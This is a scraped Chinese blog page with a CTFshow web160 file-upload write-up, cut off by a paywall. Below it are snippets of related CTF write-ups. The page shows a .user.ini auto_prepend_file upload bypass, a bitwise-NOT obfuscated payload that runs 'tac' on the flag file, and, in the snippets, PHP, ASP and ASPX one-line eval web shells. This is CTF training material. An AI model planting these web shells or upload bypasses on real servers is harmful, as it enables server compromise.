CTFshow 文件上传 web160

Kradress

已于 2022-02-16 00:19:40 修改

阅读量664

点赞数 1

分类专栏： CTFshow 文章标签： php

于 2022-02-15 21:30:17 首次发布

本文链接：https://blog.youkuaiyun.com/Kracxi/article/details/122952518

版权

本文详细记录了一次CTF比赛中的文件上传漏洞利用过程。通过在Burp Suite中修改请求参数，成功上传了.user.ini文件，并利用取反脚本进一步突破限制。最终在访问/upload目录时获取到了flag。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

思路

直接在burp里面改target和host的值,或者在本地发包
在这里插入图片描述

成功上传.user.ini

auto_prepend_file=shell.png

继续用取反来解

取反脚本

$a = "data://text/plain,<?php system('tac ../f*');?>";
echo "~("<

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Kradress

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTFshow-文件上传web151-160

qq_52579508的博客

08-12

546

提示前端校验不可靠抓包改后缀webshell连接获取flag。

CTFshow 文件上传 web163

Kradress的博客

02-16

744

目录源码思路总结源码思路先上传.user.ini 上传成功 GIF89a auto_prepend_file=png 然后上传png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?> 取反脚本 $a = "dat

1 条评论您还未登录，请先登录后发表或查看评论

CTFSHOW web160 文件上传

Mirror_iu的博客

07-26

1258

CTFSHOW web160详解

ctfshow 堆利用 160-172（继续更新）

最新发布

2502_91269216的博客

04-02

543

现在回看show和edit部分，都有提到编辑或输出ptr的内容，但是这个ptr的值一直用的是v3 chunck中存储的ptr的值，所以如果我们通过堆溢出漏洞，使ptr的值被改写，不就能够造成攻击了吗。现在我我们申请0x100的chunck会让ptr申请最上面的unsorted bin chunck，然后v3 chunck会在top chunck处切割出来。释放两个chunck，置零了v3的值，但是没有置零v3chunck中存储的ptr的值，可能存在漏洞，不过没有应用。

ctfshow-web入门-文件上传（web151-web160）

Welcome To Myon'Blog !

07-07

2022

试了下前端只能传 png 后缀的将一句话木马改成 png 后缀，上传后用 burpsuite 抓包绕过前端检测后，改回 php 后缀，发包拿到 flag：ctfshow{e3bd0332-4d5f-4255-941f-a2e6095c4f17}我们还可以直接改它前端验证的代码：原本只支持上传 png 后缀的文件我们加一个 php 后缀进去，即可直接上传 php 后缀的文件。

ctfshow—web151-160

akxnxbshai的博客

02-04

1986

目录 Web 151-152 Web 153 Web 154 Web 155 Web 156 Web 157-159 Web 160 Web 151-152 直接上传文件，然后抓包改后缀再用蚁剑连一下，找到flag即可 Web 153 php文件无法上传。发现服务器是nginx，考点是上传.user.ini配置文件，upload文件夹自带一个index.php，使其预加载木马先后上传文件.user.ini和1.txt(注意抓包改名称) 两个上传后访问/uplo

ctfshow [web] 文件上传 156--160

weixin_68906365的博客

02-18

341

可以在User-Agent处写入php代码，在包含日志文件时就可以执行该代码。.user.ini 文件可以正常上传，可以先上传.user.ini 文件然后再上传写有木马的png图片，然后访问/upload页面。可以上传.user.ini文件，new.png也可以正常上传，操作和上题一样。过滤了空格，导致原 .user.ini 文件无法正常上传。可以上传 user.ini 文件，不过木马上传失败了。看了一眼题解，发现括号被过滤了，需要用反引号执行命令。短标签开启：（配置文件：php.ini）

CTFshow 文件上传 web162

Kradress的博客

02-15

2284

目录思路总结思路大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%

CTFshow 文件上传 web164

Kradress的博客

02-16

1117

目录思路总结思路直接在burp里面改target和host的值,或者在本地发包多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传 https://github.com/huntergregal/PNG-IDAT-Payload-Generator 虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单 .user.ini也无法正常上传,应该有其他的点可以利用. 直接在网站上上传图片马后,发现显示查看图片点击查看图片后,跳转到/download.php?imag

CTFshow之web151~160---文件上传（上）

金帛的博客

06-02

2964

ctfshow的wp

ctfshow web入门 文件上传前篇(web151-web160)

ccfly1012的博客

09-17

1224

目录 web151-web152 web153 web154 web155 web156 web157-web159 web160 web161 web151-web152 首先写一个一句哈： <?php @eval($_POST["1"]);?> 然后修改文件后缀为png(题目限制)，上传文件同时进行抓包，然后修改后缀php，然后蚁剑连接，找到flag 拿到flag~~~~ web153 使用.user.ini绕过 .user.ini 摘抄...

ctfshow文件上传

njh18790816639的博客

04-23

906

web151(前端限制) 这里需要上传图片木马！所以我们需要先制作一张图片木马！ php的一句话木马： <?php @eval($_POST['pass']);?> asp的一句话是： <%eval request ("pass")%> aspx的一句话是： <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 这里是比较常用的一句话木马！ copy 1.png/b

[ctfshow]web入门——文件上传（web156-web163）

ShenZ的博客

03-18

5890

[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1：远程文件包含 way2：session条件竞争包含 web163 上传口试了试upload界面有一个默认文件，可以用上传.user.ini的方法后台应该是屏蔽了很多字符串（php

ctfshow [堆利用]-----160-180题持续更新

saulgoodman的博客

07-10

1638

嘿嘿嘿！还是先摆在这里，有时间就更新。

CTFSHOW文件上传151-170

qq_68233961的博客

02-26

1343

CTFshow文件上传

CTFshow 文件上传 web161

Kradress的博客

02-15

463

目录思路总结思路直接在burp里面改target和host的值,或者在本地发包在上传.user.ini发现失败,可能对文件内容进行检测在多次尝试后,发现文件类型为image/png,文件头加上GIF89a而且文件不能太小,要多加点内容其他都和上题一样 .user.ini GIF89a auto_prepend_file=shell.png shell.png 记得url解码 GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0

CTFshow刷题日记-WEB-文件上传

Love&Share

09-08

1559

web151-前端绕过简单只要在前端把exts:png改成php exts:'php' 访问 /upload/shell.php?shell=system("tac ../flag.php"); web152-content-type绕过这次不改前端了，直接在bp改，将Content-Type改成 image/png 总结下常见conten-type类型常见的媒体格式类型如下： text/html ： HTML格式 text/plain ：纯文本格式 text/xml ： XML格式 im

ctfshow文件上传-超详解

qq_50589021的博客

08-05

446

文件上传 web153 user.ini官方文档：自 PHP 5.3.0 起，PHP 支持基于每个目录的 INI 文件配置。此类文件仅被 CGI／FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里，则用 .htaccess 文件有同样效果。除了主 php.ini 之外，PHP 还会在每个目录下扫描 INI 文件，从被执行的 PHP 文件所在目录开始一直上升到 web 根目录（$_SERVER['DOCUMEN

ctfshow web 160

07-28

- *1* *2* *3* [ctfshow web入门文件上传](https://blog.youkuaiyun.com/m0_61448651/article/details/122451074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...